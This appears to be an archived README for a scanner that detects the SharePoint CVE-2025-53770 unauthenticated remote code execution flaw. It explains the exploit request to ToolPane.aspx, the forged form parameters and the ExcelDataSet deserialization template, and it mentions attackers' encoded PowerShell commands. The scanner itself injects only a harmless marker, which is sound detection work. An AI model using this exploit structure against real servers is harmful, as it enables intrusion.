来源

关联漏洞

描述

Scanner for the SharePoint CVE-2025-53770 RCE zero day vulnerability.

介绍

# CVE-2025-53770

This is a scanner for [the SharePoint unauthenticated Remote Code Execution vulnerability](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/), assigned CVE number CVE-2025-53770.
The code for this was written by reverse-engineering a payload seen in [the wild](https://raw.githubusercontent.com/kaizensecurity/CVE-2025-53770/refs/heads/master/payload).

Use at your own risk, I am not responsible for any negative impact this might cause.

## How does it work?

It tries to exploit the vulnerability by injecting [a marker](pkg/payload/test_payload.go) in the SharePoint ToolBox widget.
If in the SharePoint server response this unharmful marker is found, the host is marked as vulnerable.

## How to use
```zsh
# check if <TARGET-HOSTNAME> is vulnerable and try extract version information
% ./CVE-2025-53770 [<TARGET-HOSTNAME> ...]
INFO[0000] set log level                                 fields.level=info
INFO[0000] starting scanner                              targets=1
INFO[0001] detected SharePoint version                   target=<REDACTED> version="MicrosoftSharePointTeamServices: 16.0.0.5469\n"
WARN[0001] target is vulnerable                          target=<REDACTED>

# turn on debug logging and try retrieving SharePoint version information
% ./CVE-2025-53770 -log=debug -version <TARGET-HOSTNAME> 
...
```

## Who is vulnerable?

Anyone running the *on-prem* version of SharePoint server without KB5002768 & KB5002754. 

## How does this vulnerability work?

The vulnerability presumably builds upon a previously disclosed vulnerability for SharePoint, CVE-2025-49706.
By sending a HTTP POST request to `https://<TARGET>/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with a GZIP-ed, BASE64-encoded payload, you can achieve Remote Code Execution as the SharePoint runtime process.
Two form parameters are important here:

1. `MSOTlPn_Uri`: Control source path

This pretends to reference a legitimate SharePoint control (AclEditor.ascx), and tricks SharePoint into allowing the web part edit.  
This seems to be mock/fake value just to pass validation.
The original malicious payload includes `MSOTlPn_Uri=https://<TARGET>%s/_controltemplates/15/AclEditor.ascx`, but this does not seem to be used at this point.

2. `MSOTlPn_DWP`: Web partial configuration.

This parameter injects custom ASP.NET directives (`<%@ Register %>`) and server-side markup (`<Scorecard:ExcelDataSet>`).
The `CompressedDataTable` parameter holds attacker-controlled serialized data (GZIP + base64), triggering the RCE.
This payload follows a certain structure:

```xml
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="<PAYLOAD-GZIPPED-BASE64-ENCODED>" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>
```

If a control like `Scorecard:ExcelDataSet` exists and its `CompressedDataTable` property is set, it's deserialized directly by the SharePoint DWP Parser.

The payload itself can be rather interesting, as it can contain a `System.DelegateSerializationHolder` which triggers a deserialization RCE.
Threat actors abused this to pass `/c powershell -EncodedCommand <POWERSHELL-PAYLOAD>` in their payload to achieve code exection.
In our case, we merely pass a static placeholder to prove exploitability;

```xml
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<foo>
    <bar diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
        <poc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
            <TestWrapper>
                <Info>This is a harmless CVE-2025-53770 PoC marker.</Info>
                <Timestamp>2025-07-21T14:04:52Z</Timestamp>
            </TestWrapper>
        </poc>
    </bar>
</foo>
</diffgr:diffgram>
```

文件快照

 [4.0K]  /data/pocs/49715adffd94f2b96e5fe2cd2856b471148a8c37
├── [4.0K]  cmd
│   └── [2.7K]  main.go
├── [ 848]  Dockerfile
├── [ 169]  go.mod
├── [1.6K]  go.sum
├── [  48]  Makefile
├── [4.0K]  pkg
│   └── [4.0K]  payload
│       ├── [2.4K]  extract.go
│       ├── [3.5K]  payload.go
│       ├── [1.7K]  test.go
│       └── [ 685]  test_payload.go
└── [4.4K]  README.md

3 directories, 10 files

备注